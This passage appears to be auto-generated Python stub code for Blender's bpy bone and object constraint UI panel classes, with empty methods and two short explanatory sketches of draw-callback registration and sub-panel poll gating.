'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
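The `append`, `prepend`, and `remove` stubs above come from `bpy_types._GenericUI`, which lets add-ons attach extra draw callbacks to an existing panel without subclassing it. A minimal standalone sketch of that mechanism (plain Python, no `bpy`; the `DrawList` class and its `_draw_funcs` storage are invented here purely for illustration):

```python
# Illustrative sketch of _GenericUI-style draw-callback management.
# Not Blender code: DrawList is a hypothetical stand-in for a panel class.

class DrawList:
    def __init__(self):
        self._draw_funcs = []  # callbacks run in order by draw()

    def append(self, draw_func):
        # run draw_func after the previously registered callbacks
        self._draw_funcs.append(draw_func)

    def prepend(self, draw_func):
        # run draw_func before the previously registered callbacks
        self._draw_funcs.insert(0, draw_func)

    def remove(self, draw_func):
        # detach a previously registered callback
        self._draw_funcs.remove(draw_func)

    def draw(self, context):
        for func in self._draw_funcs:
            func(context)

panel = DrawList()
calls = []
panel.append(lambda ctx: calls.append("extra"))
panel.prepend(lambda ctx: calls.append("first"))
panel.draw(context=None)
# calls is now ["first", "extra"]
```

In real Blender code the same pattern is used as, e.g., `BONE_PT_bTrackToConstraint.append(my_draw_func)`, where `my_draw_func(self, context)` receives the panel instance and draws into `self.layout`.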
class BONE_PT_bTransLikeConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransformCacheConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransformConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bActionConstraint_action(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bActionConstraint_target(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bArmatureConstraint_bones(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSplineIKConstraint_chain_scaling(
ConstraintButtonsSubPanel, BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSplineIKConstraint_fitting(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransformConstraint_from(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransformConstraint_to(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
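The sub-panels above (`BONE_PT_bActionConstraint_action`, `BONE_PT_bTransformConstraint_to`, and so on) each declare a `bl_parent_id` pointing at their parent panel and use `poll`/`get_constraint` so they only draw when the matching constraint type is active. A minimal standalone sketch of that gating pattern (plain Python, no `bpy`; `Constraint`, `Context`, and `ActionSubPanel` are stand-ins invented for this example, not real bpy types):

```python
# Hypothetical sketch of the bl_parent_id + poll pattern these stubs mirror.
# Constraint and Context imitate just enough of Blender's data for the check.

class Constraint:
    def __init__(self, type_name):
        self.type = type_name  # e.g. 'ACTION', 'TRACK_TO', ...

class Context:
    def __init__(self, constraint):
        self.constraint = constraint  # active constraint, or None

class ActionSubPanel:
    bl_parent_id = "BONE_PT_bActionConstraint"  # nests under the parent panel

    @classmethod
    def poll(cls, context):
        # draw this sub-panel only when an Action constraint is active
        con = context.constraint
        return con is not None and con.type == 'ACTION'

assert ActionSubPanel.poll(Context(Constraint('ACTION')))
assert not ActionSubPanel.poll(Context(Constraint('TRACK_TO')))
```

The design keeps the UI registry flat: Blender walks all registered panels, and the combination of `bl_parent_id` and a cheap `poll` check decides nesting and visibility per redraw.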
class OBJECT_PT_bActionConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bActionConstraint_action(
ObjectConstraintPanel, ConstraintButtonsSubPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
